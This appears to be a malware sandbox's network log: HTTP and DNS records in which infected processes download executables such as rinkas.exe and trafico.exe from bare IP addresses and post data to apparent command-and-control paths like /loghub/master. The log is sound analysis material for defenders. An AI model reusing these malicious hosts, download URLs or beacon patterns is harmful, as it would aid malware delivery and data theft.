                                                                                                                Date: Thu, 12 Oct 2023 20:47:47 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 403
                                                                                                                Keep-Alive: timeout=5, max=84
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://wmrcs.net/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 186
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:48 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 403
                                                                                                                Keep-Alive: timeout=5, max=83
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://piyjoepw.com/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 262
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:48 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Keep-Alive: timeout=5, max=82
                                                                                                                Connection: Keep-Alive
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://qvvgxups.com/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 184
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:49 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 403
                                                                                                                Keep-Alive: timeout=5, max=81
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                50.23.12.20.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                50.23.12.20.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-ru
                                                                                                                POST
                                                                                                                http://5.42.92.211/loghub/master
                                                                                                                AppLaunch.exe
                                                                                                                Remote address:
                                                                                                                5.42.92.211:80
                                                                                                                Request
                                                                                                                POST /loghub/master HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=jQkTYxw2lD58DmWYUI8v
                                                                                                                Content-Length: 209
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
                                                                                                                Host: 5.42.92.211
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Response
                                                                                                                HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                Date: Thu, 12 Oct 2023 20:47:39 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Content-Length: 8
                                                                                                                Connection: keep-alive
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Referrer-Policy: same-origin
                                                                                                              • flag-ru
                                                                                                                GET
                                                                                                                http://5.42.65.80/rinkas.exe
                                                                                                                Remote address:
                                                                                                                5.42.65.80:80
                                                                                                                Request
                                                                                                                GET /rinkas.exe HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Host: 5.42.65.80
                                                                                                                Response
                                                                                                                HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                Date: Thu, 12 Oct 2023 20:47:38 GMT
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 202752
                                                                                                                Last-Modified: Thu, 12 Oct 2023 19:55:32 GMT
                                                                                                                Connection: keep-alive
                                                                                                                ETag: "65284f34-31800"
                                                                                                                Accept-Ranges: bytes
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                211.92.42.5.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                211.92.42.5.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                                211.92.42.5.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                hosted-by yeezyhostnet
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                80.65.42.5.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                80.65.42.5.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                206.23.85.13.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                206.23.85.13.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-tr
                                                                                                                GET
                                                                                                                http://185.216.70.222/trafico.exe
                                                                                                                Remote address:
                                                                                                                185.216.70.222:80
                                                                                                                Request
                                                                                                                GET /trafico.exe HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Host: 185.216.70.222
                                                                                                                Response
                                                                                                                HTTP/1.1 200 OK
                                                                                                                Date: Thu, 12 Oct 2023 20:47:39 GMT
                                                                                                                Server: Apache/2.4.29 (Ubuntu)
                                                                                                                Last-Modified: Thu, 12 Oct 2023 16:52:11 GMT
                                                                                                                ETag: "6ea00-60787c2df0daa"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 453120
                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-msdos-program
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                222.70.216.185.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                222.70.216.185.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                254.3.248.8.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                254.3.248.8.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-bg
                                                                                                                GET
                                                                                                                http://171.22.28.213/1.exe
                                                                                                                Remote address:
                                                                                                                171.22.28.213:80
                                                                                                                Request
                                                                                                                GET /1.exe HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Host: 171.22.28.213
                                                                                                                Response
                                                                                                                HTTP/1.1 200 OK
                                                                                                                Date: Thu, 12 Oct 2023 20:47:45 GMT
                                                                                                                Server: Apache/2.4.29 (Ubuntu)
                                                                                                                Last-Modified: Tue, 10 Oct 2023 14:07:59 GMT
                                                                                                                ETag: "108400-6075d3bf04880"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 1082368
                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-msdos-program
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                213.28.22.171.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                213.28.22.171.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                accounts.google.com
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                accounts.google.com
                                                                                                                IN A
                                                                                                                Response
                                                                                                                accounts.google.com
                                                                                                                IN A
                                                                                                                142.250.179.141
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://accounts.google.com/
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                142.250.179.141:443
                                                                                                                Request
                                                                                                                GET / HTTP/2.0
                                                                                                                host: accounts.google.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                dnt: 1
                                                                                                                upgrade-insecure-requests: 1
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                sec-fetch-site: none
                                                                                                                sec-fetch-mode: navigate
                                                                                                                sec-fetch-user: ?1
                                                                                                                sec-fetch-dest: document
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                142.250.179.141:443
                                                                                                                Request
                                                                                                                GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/2.0
                                                                                                                host: accounts.google.com
                                                                                                                dnt: 1
                                                                                                                upgrade-insecure-requests: 1
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                sec-fetch-site: none
                                                                                                                sec-fetch-mode: navigate
                                                                                                                sec-fetch-user: ?1
                                                                                                                sec-fetch-dest: document
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                cookie: __Host-GAPS=1:qSPyXtNQchiwXDs85Hu9kb4IOuRV6A:JVypf9qyQTMdUU5Z
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhcK3fL3PuBZwnRtldzJbqu6VIgUGaY9vhD_m5KY7Y6LEnl2nO7S-BM-P9Rx8fVz0FzqcT4l8Q
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                142.250.179.141:443
                                                                                                                Request
                                                                                                                GET /InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhcK3fL3PuBZwnRtldzJbqu6VIgUGaY9vhD_m5KY7Y6LEnl2nO7S-BM-P9Rx8fVz0FzqcT4l8Q HTTP/2.0
                                                                                                                host: accounts.google.com
                                                                                                                dnt: 1
                                                                                                                upgrade-insecure-requests: 1
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                sec-fetch-site: none
                                                                                                                sec-fetch-mode: navigate
                                                                                                                sec-fetch-user: ?1
                                                                                                                sec-fetch-dest: document
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                sec-ch-ua-full-version: "92.0.902.67"
                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                sec-ch-ua-platform-version: "10.0"
                                                                                                                sec-ch-ua-model: ""
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                cookie: __Host-GAPS=1:qSPyXtNQchiwXDs85Hu9kb4IOuRV6A:JVypf9qyQTMdUU5Z
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                www.facebook.com
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                www.facebook.com
                                                                                                                IN A
                                                                                                                Response
                                                                                                                www.facebook.com
                                                                                                                IN CNAME
                                                                                                                star-mini.c10r.facebook.com
                                                                                                                star-mini.c10r.facebook.com
                                                                                                                IN A
                                                                                                                157.240.201.35
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                208.194.73.20.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                208.194.73.20.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                141.179.250.142.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                141.179.250.142.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                                141.179.250.142.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                ams17s10-in-f131e100net
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                35.201.240.157.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                35.201.240.157.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                                35.201.240.157.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                edge-star-mini-shv-01-ams4facebookcom
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                static.xx.fbcdn.net
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                static.xx.fbcdn.net
                                                                                                                IN A
                                                                                                                Response
                                                                                                                static.xx.fbcdn.net
                                                                                                                IN CNAME
                                                                                                                scontent.xx.fbcdn.net
                                                                                                                scontent.xx.fbcdn.net
                                                                                                                IN A
                                                                                                                157.240.221.16
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                16.221.240.157.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                16.221.240.157.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                                16.221.240.157.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                xx-fbcdn-shv-01-lhr8fbcdnnet
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                facebook.com
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                facebook.com
                                                                                                                IN A
                                                                                                                Response
                                                                                                                facebook.com
                                                                                                                IN A
                                                                                                                157.240.221.35
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                fbcdn.net
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                fbcdn.net
                                                                                                                IN A
                                                                                                                Response
                                                                                                                fbcdn.net
                                                                                                                IN A
                                                                                                                157.240.221.35
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                35.221.240.157.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                35.221.240.157.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                                35.221.240.157.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                edge-star-mini-shv-01-lhr8facebookcom
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                fbsbx.com
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                fbsbx.com
                                                                                                                IN A
                                                                                                                Response
                                                                                                                fbsbx.com
                                                                                                                IN A
                                                                                                                157.240.221.35
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                2.136.104.51.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                2.136.104.51.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.124.1/theme/index.php
                                                                                                                explothe.exe
                                                                                                                Remote address:
                                                                                                                77.91.124.1:80
                                                                                                                Request
                                                                                                                POST /theme/index.php HTTP/1.1
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Host: 77.91.124.1
                                                                                                                Content-Length: 89
                                                                                                                Cache-Control: no-cache
                                                                                                                Response
                                                                                                                HTTP/1.1 200 OK
                                                                                                                Date: Thu, 12 Oct 2023 20:47:53 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 6
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                195.179.250.142.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                195.179.250.142.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                                195.179.250.142.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                ams15s42-in-f31e100net
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                1.124.91.77.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                1.124.91.77.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                                1.124.91.77.in-addr.arpa
                                                                                                                IN PTR
                                                                                                              • flag-ru
                                                                                                                POST
                                                                                                                http://5.42.65.80/8bmeVwqx/index.php
                                                                                                                oneetx.exe
                                                                                                                Remote address:
                                                                                                                5.42.65.80:80
                                                                                                                Request
                                                                                                                POST /8bmeVwqx/index.php HTTP/1.1
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Host: 5.42.65.80
                                                                                                                Content-Length: 89
                                                                                                                Cache-Control: no-cache
                                                                                                                Response
                                                                                                                HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                Date: Thu, 12 Oct 2023 20:47:56 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: keep-alive
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                131.179.250.142.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                131.179.250.142.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                                131.179.250.142.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                ams17s10-in-f31e100net
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                learn.microsoft.com
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                learn.microsoft.com
                                                                                                                IN A
                                                                                                                Response
                                                                                                                learn.microsoft.com
                                                                                                                IN CNAME
                                                                                                                learn-public.trafficmanager.net
                                                                                                                learn-public.trafficmanager.net
                                                                                                                IN CNAME
                                                                                                                learn.microsoft.com.edgekey.net
                                                                                                                learn.microsoft.com.edgekey.net
                                                                                                                IN CNAME
                                                                                                                learn.microsoft.com.edgekey.net.globalredir.akadns.net
                                                                                                                learn.microsoft.com.edgekey.net.globalredir.akadns.net
                                                                                                                IN CNAME
                                                                                                                e13636.dscb.akamaiedge.net
                                                                                                                e13636.dscb.akamaiedge.net
                                                                                                                IN A
                                                                                                                104.85.2.139
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                learn.microsoft.com
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                learn.microsoft.com
                                                                                                                IN A
                                                                                                                Response
                                                                                                                learn.microsoft.com
                                                                                                                IN CNAME
                                                                                                                learn-public.trafficmanager.net
                                                                                                                learn-public.trafficmanager.net
                                                                                                                IN CNAME
                                                                                                                learn.microsoft.com.edgekey.net
                                                                                                                learn.microsoft.com.edgekey.net
                                                                                                                IN CNAME
                                                                                                                learn.microsoft.com.edgekey.net.globalredir.akadns.net
                                                                                                                learn.microsoft.com.edgekey.net.globalredir.akadns.net
                                                                                                                IN CNAME
                                                                                                                e13636.dscb.akamaiedge.net
                                                                                                                e13636.dscb.akamaiedge.net
                                                                                                                IN A
                                                                                                                104.85.2.139
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                59.82.57.23.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                59.82.57.23.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                                59.82.57.23.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                a23-57-82-59deploystaticakamaitechnologiescom
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                dnt: 1
                                                                                                                upgrade-insecure-requests: 1
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                sec-fetch-site: none
                                                                                                                sec-fetch-mode: navigate
                                                                                                                sec-fetch-user: ?1
                                                                                                                sec-fetch-dest: document
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 301
                                                                                                                location: /en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
                                                                                                                x-datacenter: eus
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-ua-compatible: IE=edge
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 0nlsoZQAAAAArOFFf8yO6TZchGwEoMiZDQlJVMzBFREdFMTAyMAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
                                                                                                                content-length: 0
                                                                                                                cache-control: no-cache, no-store
                                                                                                                expires: Thu, 12 Oct 2023 20:48:30 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:30 GMT
                                                                                                                akamai-cache-status: Miss from child, Miss from parent
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                dnt: 1
                                                                                                                upgrade-insecure-requests: 1
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                sec-fetch-site: none
                                                                                                                sec-fetch-mode: navigate
                                                                                                                sec-fetch-user: ?1
                                                                                                                sec-fetch-dest: document
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 301
                                                                                                                location: /en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
                                                                                                                x-datacenter: eus
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-ua-compatible: IE=edge
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 0nlsoZQAAAAAVr3JIgcWgTarK1Db+YMrgQlJVMzBFREdFMDQxMgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
                                                                                                                content-length: 0
                                                                                                                cache-control: no-cache, no-store
                                                                                                                expires: Thu, 12 Oct 2023 20:48:30 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:30 GMT
                                                                                                                akamai-cache-status: Miss from child, Miss from parent
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                dnt: 1
                                                                                                                upgrade-insecure-requests: 1
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                sec-fetch-site: none
                                                                                                                sec-fetch-mode: navigate
                                                                                                                sec-fetch-user: ?1
                                                                                                                sec-fetch-dest: document
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-type: text/html
                                                                                                                content-encoding: gzip
                                                                                                                etag: "w2dmPny5rf4TWT8Z8/EljCyVLv1Uf/zPWlMpbkbsUe8="
                                                                                                                vary: Accept-Encoding
                                                                                                                request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
                                                                                                                x-datacenter: eus
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-ua-compatible: IE=edge
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                x-rendering-stack: Dynamic
